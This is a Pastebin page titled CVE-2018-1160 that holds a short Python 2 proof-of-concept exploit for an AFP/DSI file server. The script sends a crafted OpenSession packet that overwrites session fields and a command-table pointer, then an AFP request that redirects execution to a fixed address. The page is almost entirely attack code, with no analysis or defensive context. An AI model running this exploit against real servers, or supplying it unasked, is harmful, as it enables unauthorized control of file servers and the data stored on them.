SHARE
TWEET

CVE-2018-1160

TVT618 Dec 29th, 2018 697 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2. import struct
  3. import sys
  4. if len(sys.argv) != 3:
  5.     sys.exit(0)
  6. ip = sys.argv[1]
  7. port = int(sys.argv[2])
  8. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
  10. sock.connect((ip, port))
  11. dsi_payload = "\x00\x00\x40\x00" # client quantum
  12. dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
  13. dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
  14. dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
  15. dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
  16. dsi_opensession = "\x01" # attention quantum option
  17. dsi_opensession += struct.pack("B", len(dsi_payload)) # length
  18. dsi_opensession += dsi_payload
  19. dsi_header = "\x00" # "request" flag
  20. dsi_header += "\x04" # open session command
  21. dsi_header += "\x00\x01" # request id
  22. dsi_header += "\x00\x00\x00\x00" # data offset
  23. dsi_header += struct.pack(">I", len(dsi_opensession))
  24. dsi_header += "\x00\x00\x00\x00" # reserved
  25. dsi_header += dsi_opensession
  26. sock.sendall(dsi_header)
  27. resp = sock.recv(1024)
  28. print "[+] Open Session complete"
  29. afp_command = "\x01" # invoke the second entry in the table
  30. afp_command += "\x00" # protocol defined padding
  31. afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
  32. afp_command += struct.pack("Q", 0x4295f0) # address to jump to
  33. dsi_header = "\x00" # "request" flag
  34. dsi_header += "\x02" # "AFP" command
  35. dsi_header += "\x00\x02" # request id
  36. dsi_header += "\x00\x00\x00\x00" # data offset
  37. dsi_header += struct.pack(">I", len(afp_command))
  38. dsi_header += '\x00\x00\x00\x00' # reserved
  39. dsi_header += afp_command
  40. print "[+] Sending get server info request"
  41. sock.sendall(dsi_header)
  42. resp = sock.recv(1024)
  43. print resp
  44. print "[+] Fin."
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top